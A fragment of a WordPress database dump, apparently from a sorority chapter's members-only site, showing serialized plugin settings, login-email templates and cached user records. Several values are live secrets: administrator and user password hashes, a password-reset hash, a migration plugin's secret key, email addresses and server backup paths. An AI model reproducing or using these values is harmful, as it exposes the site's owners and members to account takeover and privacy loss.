\";s:11:\"pending_url\";s:0:\"\";s:11:\"after_login\";s:12:\"redirect_url\";s:18:\"login_redirect_url\";s:41:\"www.development.zphiblgz.org/members-only\";s:12:\"after_logout\";s:13:\"redirect_home\";s:19:\"logout_redirect_url\";s:0:\"\";s:12:\"after_delete\";s:13:\"redirect_home\";s:19:\"delete_redirect_url\";s:0:\"\";s:11:\"super_admin\";i:0;}','yes'),(2215,'um_cache_userdata_1','a:301:{s:2:\"ID\";i:1;s:10:\"user_login\";s:15:\"pr@zphiblgz.org\";s:9:\"user_pass\";s:34:\"$P$B2jxOyemgCdrH1rGUDmHulhjCZZsjP/\";s:13:\"user_nicename\";s:14:\"przphiblgz-org\";s:10:\"user_email\";s:15:\"pr@zphiblgz.org\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2016-11-29 16:28:18\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:15:\"pr@zphiblgz.org\";s:13:\"administrator\";b:1;s:8:\"wp_roles\";s:13:\"administrator\";s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:17:\"cuar_view_account\";b:1;s:17:\"cuar_edit_account\";b:1;s:16:\"cuar_pp_list_all\";b:1;s:12:\"cuar_pp_edit\";b:1;s:14:\"cuar_pp_delete\";b:1;s:12:\"cuar_pp_read\";b:1;s:25:\"cuar_pp_manage_categories\";b:1;s:23:\"cuar_pp_edit_categories\";b:1;s:25:\"cuar_pp_delete_categories\";b:1;s:25:\"cuar_pp_assign_categories\";b:1;s:15:\"cuar_view_pages\";b:1;s:31:\"cuar_view_any_cuar_private_page\";b:1;s:26:\"cuar_pf_manage_attachments\";b:1;s:16:\"cuar_pf_list_all\";b:1;s:12:\"cuar_pf_edit\";b:1;s:14:\"cuar_pf_delete\";b:1;s:12:\"cuar_pf_read\";b:1;s:25:\"cuar_pf_manage_categories\";b:1;s:23:\"cuar_pf_edit_categories\";b:1;s:25:\"cuar_pf_delete_categories\";b:1;s:25:\"cuar_pf_assign_categories\";b:1;s:15:\"cuar_view_files\";b:1;s:31:\"cuar_view_any_cuar_private_file\";b:1;s:23:\"cuar_access_admin_panel\";b:1;s:23:\"view-customer-area-menu\";b:1;s:17:\"cuar_view_top_bar\";b:1;s:17:\"manage_events_cap\";b:1;s:23:\"manage_ticket_types_cap\";b:1;s:25:\"manage_discount_codes_cap\";b:1;s:17:\"manage_orders_cap\";b:1;s:20:\"manage_attendees_cap\";b:1;s:27:\"manage_ticket_templates_cap\";b:1;s:19:\"delete_checkins_cap\";b:1;s:20:\"delete_attendees_cap\";b:1;s:19:\"manage_settings_cap\";b:1;s:15:\"save_ticket_cap\";b:1;s:16:\"add_discount_cap\";b:1;s:17:\"publish_tc_events\";b:1;s:14:\"edit_tc_events\";b:1;s:21:\"edit_others_tc_events\";b:1;s:16:\"delete_tc_events\";b:1;s:23:\"delete_others_tc_events\";b:1;s:22:\"read_private_tc_events\";b:1;s:13:\"edit_tc_event\";b:1;s:15:\"delete_tc_event\";b:1;s:13:\"read_tc_event\";b:1;s:24:\"edit_published_tc_events\";b:1;s:22:\"edit_private_tc_events\";b:1;s:24:\"delete_private_tc_events\";b:1;s:26:\"delete_published_tc_events\";b:1;s:16:\"create_tc_events\";b:1;s:18:\"publish_tc_tickets\";b:1;s:15:\"edit_tc_tickets\";b:1;s:14:\"edit_tc_ticket\";b:1;s:22:\"edit_others_tc_tickets\";b:1;s:17:\"delete_tc_tickets\";b:1;s:24:\"delete_others_tc_tickets\";b:1;s:23:\"read_private_tc_tickets\";b:1;s:16:\"delete_tc_ticket\";b:1;s:14:\"read_tc_ticket\";b:1;s:25:\"edit_published_tc_tickets\";b:1;s:23:\"edit_private_tc_tickets\";b:1;s:25:\"delete_private_tc_tickets\";b:1;s:27:\"delete_published_tc_tickets\";b:1;s:17:\"create_tc_tickets\";b:1;s:24:\"edit_tc_tickets_instance\";b:1;s:24:\"read_tc_tickets_instance\";b:1;s:26:\"delete_tc_tickets_instance\";b:1;s:27:\"create_tc_tickets_instances\";b:1;s:25:\"edit_tc_tickets_instances\";b:1;s:38:\"edit_others_posts_tc_tickets_instances\";b:1;s:28:\"publish_tc_tickets_instances\";b:1;s:33:\"read_private_tc_tickets_instances\";b:1;s:27:\"delete_tc_tickets_instances\";b:1;s:35:\"delete_private_tc_tickets_instances\";b:1;s:37:\"delete_published_tc_tickets_instances\";b:1;s:34:\"delete_others_tc_tickets_instances\";b:1;s:33:\"edit_private_tc_tickets_instances\";b:1;s:35:\"edit_published_tc_tickets_instances\";b:1;s:13:\"edit_tc_order\";b:1;s:13:\"read_tc_order\";b:1;s:15:\"delete_tc_order\";b:1;s:16:\"create_tc_orders\";b:1;s:14:\"edit_tc_orders\";b:1;s:27:\"edit_others_posts_tc_orders\";b:1;s:17:\"publish_tc_orders\";b:1;s:22:\"read_private_tc_orders\";b:1;s:16:\"delete_tc_orders\";b:1;s:24:\"delete_private_tc_orders\";b:1;s:26:\"delete_published_tc_orders\";b:1;s:23:\"delete_others_tc_orders\";b:1;s:22:\"edit_private_tc_orders\";b:1;s:24:\"edit_published_tc_orders\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:6:\"sp_cdm\";b:1;s:14:\"sp_cdm_vendors\";b:1;s:15:\"sp_cdm_settings\";b:1;s:15:\"sp_cdm_projects\";b:1;s:15:\"sp_cdm_uploader\";b:1;s:16:\"sp_cdm_user_logs\";b:1;s:11:\"sp_cdm_help\";b:1;s:12:\"sp_cdm_forms\";b:1;s:13:\"sp_cdm_groups\";b:1;s:17:\"sp_cdm_categories\";b:1;s:15:\"sp_cdm_top_menu\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:14:\"ure_edit_roles\";b:1;s:16:\"ure_create_roles\";b:1;s:16:\"ure_delete_roles\";b:1;s:23:\"ure_create_capabilities\";b:1;s:23:\"ure_delete_capabilities\";b:1;s:18:\"ure_manage_options\";b:1;s:15:\"ure_reset_roles\";b:1;s:6:\"filter\";N;s:8:\"nickname\";s:15:\"pr@zphiblgz.org\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:12:\"rich_editing\";s:4:\"true\";s:17:\"comment_shortcuts\";s:5:\"false\";s:11:\"admin_color\";s:5:\"fresh\";s:7:\"use_ssl\";s:1:\"0\";s:20:\"show_admin_bar_front\";s:4:\"true\";s:20:\"wp_tegx_capabilities\";s:31:\"a:1:{s:13:\"administrator\";b:1;}\";s:18:\"wp_tegx_user_level\";s:2:\"10\";s:18:\"show_welcome_panel\";s:1:\"1\";s:21:\"wp_tegx_user-settings\";s:68:\"editor=tinymce&libraryContent=browse&urlbutton=file&hidetb=1&mfold=o\";s:26:\"wp_tegx_user-settings-time\";s:10:\"1480898738\";s:42:\"wp_tegx_dashboard_quick_press_last_post_id\";s:1:\"3\";s:34:\"manageedit-shop_ordercolumnshidden\";s:33:\"a:1:{i:0;s:15:\"billing_address\";}\";s:28:\"_woocommerce_persistent_cart\";s:321:\"a:1:{s:4:\"cart\";a:1:{s:32:\"0fcbc61acd0479dc77e3cccc0f5ffca7\";a:9:{s:10:\"product_id\";i:531;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:10:\"line_total\";d:40;s:8:\"line_tax\";i:0;s:13:\"line_subtotal\";d:40;s:17:\"line_subtotal_tax\";i:0;s:13:\"line_tax_data\";a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}}}}\";s:14:\"account_status\";s:8:\"approved\";s:4:\"role\";s:5:\"admin\";s:17:\"wp_tegx_r_tru_u_x\";s:46:\"a:2:{s:2:\"id\";i:0;s:7:\"expires\";i:1480705021;}\";s:35:\"um_email_as_username_przphiblgz-org\";s:15:\"pr@zphiblgz.org\";s:35:\"um_user_profile_url_slug_user_login\";s:14:\"przphiblgz-org\";s:12:\"last_project\";N;s:24:\"um_account_secure_fields\";s:2408:\"a:4:{s:7:\"general\";a:4:{s:10:\"user_login\";a:10:{s:5:\"title\";s:8:\"Username\";s:7:\"metakey\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:8:\"Username\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:0;s:8:\"validate\";s:15:\"unique_username\";s:9:\"min_chars\";i:3;s:9:\"max_chars\";i:24;}s:10:\"first_name\";a:7:{s:5:\"title\";s:10:\"First Name\";s:7:\"metakey\";s:10:\"first_name\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;}s:9:\"last_name\";a:7:{s:5:\"title\";s:9:\"Last Name\";s:7:\"metakey\";s:9:\"last_name\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;}s:10:\"user_email\";a:7:{s:5:\"title\";s:14:\"E-mail Address\";s:7:\"metakey\";s:10:\"user_email\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:14:\"E-mail Address\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"validate\";s:12:\"unique_email\";}}s:8:\"password\";a:1:{s:13:\"user_password\";a:11:{s:5:\"title\";s:8:\"Password\";s:7:\"metakey\";s:13:\"user_password\";s:4:\"type\";s:8:\"password\";s:5:\"label\";s:8:\"Password\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:9:\"min_chars\";i:8;s:9:\"max_chars\";i:30;s:15:\"force_good_pass\";i:1;s:18:\"force_confirm_pass\";i:1;}}s:7:\"privacy\";a:2:{s:15:\"profile_privacy\";a:13:{s:5:\"title\";s:15:\"Profile Privacy\";s:7:\"metakey\";s:15:\"profile_privacy\";s:4:\"type\";s:6:\"select\";s:5:\"label\";s:15:\"Profile Privacy\";s:4:\"help\";s:32:\"Who can see your public profile?\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:7:\"default\";s:8:\"Everyone\";s:7:\"options\";a:2:{i:0;s:8:\"Everyone\";i:1;s:7:\"Only me\";}s:10:\"allowclear\";i:0;s:12:\"account_only\";b:1;s:13:\"required_perm\";s:24:\"can_make_private_profile\";}s:15:\"hide_in_members\";a:12:{s:5:\"title\";s:30:\"Hide my profile from directory\";s:7:\"metakey\";s:15:\"hide_in_members\";s:4:\"type\";s:5:\"radio\";s:5:\"label\";s:30:\"Hide my profile from directory\";s:4:\"help\";s:61:\"Here you can hide yourself from appearing in public directory\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:7:\"default\";s:2:\"No\";s:7:\"options\";a:2:{i:0;s:2:\"No\";i:1;s:3:\"Yes\";}s:12:\"account_only\";b:1;s:12:\"required_opt\";a:2:{i:0;s:12:\"members_page\";i:1;i:1;}}}s:6:\"delete\";a:1:{s:20:\"single_user_password\";a:8:{s:5:\"title\";s:8:\"Password\";s:7:\"metakey\";s:20:\"single_user_password\";s:4:\"type\";s:8:\"password\";s:5:\"label\";s:8:\"Password\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:12:\"account_only\";b:1;}}}\";s:14:\"_um_last_login\";s:10:\"1480946500\";s:19:\"account_status_name\";s:8:\"Approved\";s:4:\"core\";s:5:\"admin\";s:18:\"can_access_wpadmin\";s:1:\"1\";s:20:\"can_not_see_adminbar\";s:1:\"0\";s:17:\"can_edit_everyone\";s:1:\"1\";s:19:\"can_delete_everyone\";s:1:\"1\";s:16:\"can_edit_profile\";s:1:\"1\";s:18:\"can_delete_profile\";s:1:\"1\";s:12:\"can_view_all\";s:1:\"1\";s:24:\"can_make_private_profile\";s:1:\"1\";s:26:\"can_access_private_profile\";s:1:\"1\";s:16:\"default_homepage\";s:1:\"1\";s:6:\"status\";s:7:\"pending\";s:16:\"auto_approve_act\";s:16:\"redirect_profile\";s:11:\"after_login\";s:16:\"redirect_profile\";s:12:\"after_logout\";s:13:\"redirect_home\";s:11:\"synced_role\";s:13:\"administrator\";s:17:\"redirect_homepage\";s:0:\"\";s:16:\"auto_approve_url\";s:0:\"\";s:20:\"login_email_activate\";s:1:\"0\";s:16:\"checkmail_action\";s:12:\"show_message\";s:17:\"checkmail_message\";s:147:\"Thank you for registering. Before you can login we need you to activate your account by clicking the activation link in the email we just sent you.\";s:13:\"checkmail_url\";s:0:\"\";s:18:\"url_email_activate\";s:0:\"\";s:14:\"pending_action\";s:12:\"show_message\";s:15:\"pending_message\";s:107:\"Membership to our site is restricted to members of Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta chapter. \";s:11:\"pending_url\";s:0:\"\";s:18:\"login_redirect_url\";s:0:\"\";s:19:\"logout_redirect_url\";s:0:\"\";s:12:\"after_delete\";s:13:\"redirect_home\";s:19:\"delete_redirect_url\";s:0:\"\";s:11:\"super_admin\";i:1;}','yes'),(2546,'wd_form_maker_version','1.8.38','no'),(9465,'contact_form_forms','10,11,12,13,14,15,16,17,18','yes'),(2548,'wd_cfield_limit','9','no'),(2118,'um_existing_rows_544','a:1:{i:0;s:9:\"_um_row_1\";}','yes'),(2119,'um_form_rowdata_544','a:1:{s:9:\"_um_row_1\";a:4:{s:4:\"type\";s:3:\"row\";s:2:\"id\";s:9:\"_um_row_1\";s:8:\"sub_rows\";s:1:\"1\";s:4:\"cols\";s:1:\"1\";}}','yes'),(2213,'um_cache_userdata_4','a:53:{s:2:\"ID\";i:4;s:10:\"user_login\";s:8:\"Testing2\";s:9:\"user_pass\";s:34:\"$P$Bg.lSaiwm/Trfpq7TMwRP02D79ymBS/\";s:13:\"user_nicename\";s:8:\"testing2\";s:10:\"user_email\";s:22:\"cwhitaker@howardcc.edu\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2016-12-05 18:08:25\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:0:\"\";s:10:\"subscriber\";b:1;s:8:\"wp_roles\";s:10:\"subscriber\";s:12:\"cuar_pf_read\";b:1;s:4:\"read\";b:1;s:6:\"sp_cdm\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:15:\"sp_cdm_uploader\";b:1;s:6:\"filter\";N;s:8:\"nickname\";s:8:\"Testing2\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:12:\"rich_editing\";s:4:\"true\";s:17:\"comment_shortcuts\";s:5:\"false\";s:11:\"admin_color\";s:5:\"fresh\";s:7:\"use_ssl\";s:1:\"0\";s:20:\"show_admin_bar_front\";s:4:\"true\";s:20:\"wp_tegx_capabilities\";s:28:\"a:1:{s:10:\"subscriber\";b:1;}\";s:18:\"wp_tegx_user_level\";s:1:\"0\";s:4:\"role\";s:6:\"member\";s:9:\"submitted\";N;s:14:\"_um_last_login\";s:10:\"1480961305\";s:35:\"um_user_profile_url_slug_user_login\";s:8:\"testing2\";s:11:\"last_update\";s:10:\"1480961305\";s:15:\"reset_pass_hash\";s:40:\"IUDUcDT1JttN56AuRNmoPFegaIYT8AeaZYJdD01p\";s:14:\"account_status\";s:8:\"approved\";s:9:\"full_name\";s:8:\"testing2\";s:19:\"account_status_name\";s:8:\"Approved\";s:4:\"core\";s:6:\"member\";s:18:\"can_access_wpadmin\";s:1:\"0\";s:20:\"can_not_see_adminbar\";s:1:\"1\";s:17:\"can_edit_everyone\";s:1:\"0\";s:19:\"can_delete_everyone\";s:1:\"0\";s:16:\"can_edit_profile\";s:1:\"1\";s:18:\"can_delete_profile\";s:1:\"1\";s:12:\"can_view_all\";s:1:\"1\";s:24:\"can_make_private_profile\";s:1:\"0\";s:26:\"can_access_private_profile\";s:1:\"0\";s:16:\"default_homepage\";s:1:\"1\";s:6:\"status\";s:8:\"approved\";s:16:\"auto_approve_act\";s:16:\"redirect_profile\";s:11:\"after_login\";s:16:\"redirect_profile\";s:12:\"after_logout\";s:13:\"redirect_home\";s:11:\"super_admin\";i:0;}','yes'),(2303,'widget_theme-my-login','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(142488,'_tml_installed_at','1537220351','no'),(142489,'_tml_updated_at','1632297683','no'),(142490,'_tml_previous_version','7.1.2','no'),(142491,'_tml_version','7.1.3','no'),(17634,'ai1wm_updater','a:0:{}','yes'),(17343,'ppr_version','5.1.8','yes'),(17348,'quickppr_redirects_meta','a:2:{s:59:\"http://development.zphiblgz.org/cause/bring-water-children/\";a:2:{s:9:\"newwindow\";i:0;s:8:\"nofollow\";i:0;}s:47:\"http://zphiblgz.org/cause/bring-water-children/\";a:2:{s:9:\"newwindow\";i:0;s:8:\"nofollow\";i:0;}}','yes'),(17699,'duplicator_settings','a:17:{s:7:\"version\";s:5:\"1.4.3\";s:18:\"uninstall_settings\";b:1;s:15:\"uninstall_files\";b:1;s:16:\"uninstall_tables\";b:1;s:13:\"package_debug\";b:0;s:17:\"package_mysqldump\";b:0;s:22:\"package_mysqldump_path\";s:0:\"\";s:24:\"package_phpdump_qrylimit\";s:3:\"100\";s:17:\"package_zip_flush\";b:0;s:19:\"installer_name_mode\";s:6:\"simple\";s:16:\"storage_position\";s:6:\"legacy\";s:20:\"storage_htaccess_off\";b:0;s:18:\"archive_build_mode\";i:2;s:17:\"skip_archive_scan\";b:0;s:21:\"unhook_third_party_js\";b:0;s:22:\"unhook_third_party_css\";b:0;s:17:\"active_package_id\";i:-1;}','yes'),(17700,'duplicator_version_plugin','1.4.3','yes'),(17701,'duplicator_ui_view_state','a:3:{s:22:\"dup-pack-storage-panel\";s:1:\"1\";s:22:\"dup-pack-archive-panel\";s:1:\"1\";s:24:\"dup-pack-installer-panel\";s:1:\"0\";}','yes'),(17702,'duplicator_package_active','O:11:\"DUP_Package\":23:{s:7:\"Created\";s:19:\"2017-01-16 05:33:16\";s:7:\"Version\";s:6:\"1.1.26\";s:9:\"VersionWP\";s:5:\"4.6.2\";s:9:\"VersionDB\";s:6:\"5.6.32\";s:10:\"VersionPHP\";s:6:\"5.6.29\";s:9:\"VersionOS\";s:5:\"Linux\";s:2:\"ID\";N;s:4:\"Name\";s:35:\"20170116_zetaphibetasororityinclamb\";s:4:\"Hash\";s:29:\"587c5b1cd0f576844170116053316\";s:8:\"NameHash\";s:65:\"20170116_zetaphibetasororityinclamb_587c5b1cd0f576844170116053316\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:9:\"StorePath\";s:56:\"/home4/zphiblgz/public_html/development/wp-snapshots/tmp\";s:8:\"StoreURL\";s:45:\"https://zphiblgz.org/wp-snapshots/\";s:8:\"ScanFile\";s:75:\"20170116_zetaphibetasororityinclamb_587c5b1cd0f576844170116053316_scan.json\";s:7:\"Runtime\";N;s:7:\"ExeSize\";N;s:7:\"ZipSize\";N;s:6:\"Status\";N;s:6:\"WPUser\";N;s:7:\"Archive\";O:11:\"DUP_Archive\":13:{s:10:\"FilterDirs\";s:0:\"\";s:10:\"FilterExts\";s:0:\"\";s:13:\"FilterDirsAll\";a:0:{}s:13:\"FilterExtsAll\";a:0:{}s:8:\"FilterOn\";i:0;s:4:\"File\";N;s:6:\"Format\";s:3:\"ZIP\";s:7:\"PackDir\";s:39:\"/home4/zphiblgz/public_html/development\";s:4:\"Size\";i:0;s:4:\"Dirs\";a:0:{}s:5:\"Files\";a:0:{}s:10:\"FilterInfo\";O:23:\"DUP_Archive_Filter_Info\":6:{s:4:\"Dirs\";O:34:\"DUP_Archive_Filter_Scope_Directory\":4:{s:7:\"Warning\";a:0:{}s:10:\"Unreadable\";a:0:{}s:4:\"Core\";a:0:{}s:8:\"Instance\";a:0:{}}s:5:\"Files\";O:29:\"DUP_Archive_Filter_Scope_File\":5:{s:4:\"Size\";a:0:{}s:7:\"Warning\";a:0:{}s:10:\"Unreadable\";a:0:{}s:4:\"Core\";a:0:{}s:8:\"Instance\";a:0:{}}s:4:\"Exts\";O:29:\"DUP_Archive_Filter_Scope_Base\":2:{s:4:\"Core\";a:0:{}s:8:\"Instance\";a:0:{}}s:9:\"UDirCount\";i:0;s:10:\"UFileCount\";i:0;s:9:\"UExtCount\";i:0;}s:10:\"\0*\0Package\";O:11:\"DUP_Package\":23:{s:7:\"Created\";s:19:\"2017-01-16 05:33:16\";s:7:\"Version\";s:6:\"1.1.26\";s:9:\"VersionWP\";s:5:\"4.6.2\";s:9:\"VersionDB\";s:6:\"5.6.32\";s:10:\"VersionPHP\";s:6:\"5.6.29\";s:9:\"VersionOS\";s:5:\"Linux\";s:2:\"ID\";N;s:4:\"Name\";s:35:\"20170116_zetaphibetasororityinclamb\";s:4:\"Hash\";s:29:\"587c5b1cd0f576844170116053316\";s:8:\"NameHash\";s:65:\"20170116_zetaphibetasororityinclamb_587c5b1cd0f576844170116053316\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:9:\"StorePath\";s:56:\"/home4/zphiblgz/public_html/development/wp-snapshots/tmp\";s:8:\"StoreURL\";s:45:\"https://zphiblgz.org/wp-snapshots/\";s:8:\"ScanFile\";N;s:7:\"Runtime\";N;s:7:\"ExeSize\";N;s:7:\"ZipSize\";N;s:6:\"Status\";N;s:6:\"WPUser\";N;s:7:\"Archive\";r:22;s:9:\"Installer\";O:13:\"DUP_Installer\":12:{s:4:\"File\";N;s:4:\"Size\";i:0;s:10:\"OptsDBHost\";s:0:\"\";s:10:\"OptsDBPort\";s:0:\"\";s:10:\"OptsDBName\";s:0:\"\";s:10:\"OptsDBUser\";s:0:\"\";s:12:\"OptsSSLAdmin\";i:0;s:12:\"OptsSSLLogin\";i:0;s:11:\"OptsCacheWP\";i:0;s:13:\"OptsCachePath\";i:0;s:10:\"OptsURLNew\";s:0:\"\";s:10:\"\0*\0Package\";r:52;}s:8:\"Database\";O:12:\"DUP_Database\":12:{s:4:\"Type\";s:5:\"MySQL\";s:4:\"Size\";N;s:4:\"File\";N;s:4:\"Path\";N;s:12:\"FilterTables\";s:0:\"\";s:8:\"FilterOn\";i:0;s:4:\"Name\";N;s:10:\"Compatible\";s:0:\"\";s:10:\"\0*\0Package\";r:52;s:25:\"\0DUP_Database\0dbStorePath\";N;s:23:\"\0DUP_Database\0EOFMarker\";s:0:\"\";s:26:\"\0DUP_Database\0networkFlush\";b:0;}}}s:9:\"Installer\";r:74;s:8:\"Database\";r:87;}','yes'),(17347,'quickppr_redirects','a:2:{s:59:\"http://development.zphiblgz.org/cause/bring-water-children/\";s:33:\"https://zphiblgz.org/scholarship/\";s:47:\"http://zphiblgz.org/cause/bring-water-children/\";s:33:\"https://zphiblgz.org/scholarship/\";}','yes'),(17417,'MBFREE_CREATED','1484518716','yes'),(17418,'MBFREE_HOMEURL','https://zphiblgz.org','yes'),(17419,'maxbuttons_user_level','manage_options','yes'),(17583,'ai1wm_secret_key','mHaALEHF8BhD','yes'),(16119,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:15:\"pr@zphiblgz.org\";s:7:\"version\";s:5:\"5.6.5\";s:9:\"timestamp\";i:1631162731;}','no'),(15250,'acx_widget_si_next_date','1486694591','yes'),(15251,'acx_widget_si_td','show','yes'),(15253,'acx_widget_si_installed_date','1484102634','yes'),(15254,'social_widget_icon_array_order','s:102:\"a:8:{i:0;s:1:\"1\";i:1;s:1:\"0\";i:2;s:1:\"7\";i:3;s:1:\"2\";i:4;s:1:\"3\";i:5;s:1:\"4\";i:6;s:1:\"5\";i:7;s:1:\"6\";}\";','yes'),(3007,'widget_wcp_caption','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(8381,'forgot_password_link_mail_subject','Password Reset Request','yes'),(8382,'forgot_password_link_mail_body','Someone requested that the password be reset for the following account:\r\n&lt;br&gt;\r\n#site_url#\r\n&lt;br&gt;\r\nUsername: #user_name#\r\n&lt;br&gt;\r\nIf this was a mistake, just ignore this email and nothing will happen.\r\n&lt;br&gt;\r\nTo reset your password, visit the following address:\r\n&lt;br&gt;\r\n#resetlink#','yes'),(8383,'new_password_mail_subject','Password Reset Request','yes'),(8384,'new_password_mail_body','Your new password for the account at:\r\n&lt;br&gt;\r\n#site_url#\r\n&lt;br&gt;\r\nUsername: #user_name#\r\n&lt;br&gt;\r\nPassword: #user_password#\r\n&lt;br&gt;\r\nYou can now login with your new password at:\r\n#site_url#','yes'),(8385,'custom_style_afo','.log_forms{ width:98%; padding:5px; border:1px solid #CCC; margin:2px; } .log_forms input[type=text], input[type=password] { margin: 10px 0 20px; width: 99%; padding: 7px 0 7px 4px; border: 1px solid #E3E3E3; } .log_forms input[type=submit] { margin: 10px 0 20px; width: 100%; padding: 7px; border: 1px solid #7ac9b7; } .log_forms input[type=text]:focus, input[type=password]:focus { border-color: #4697e4; 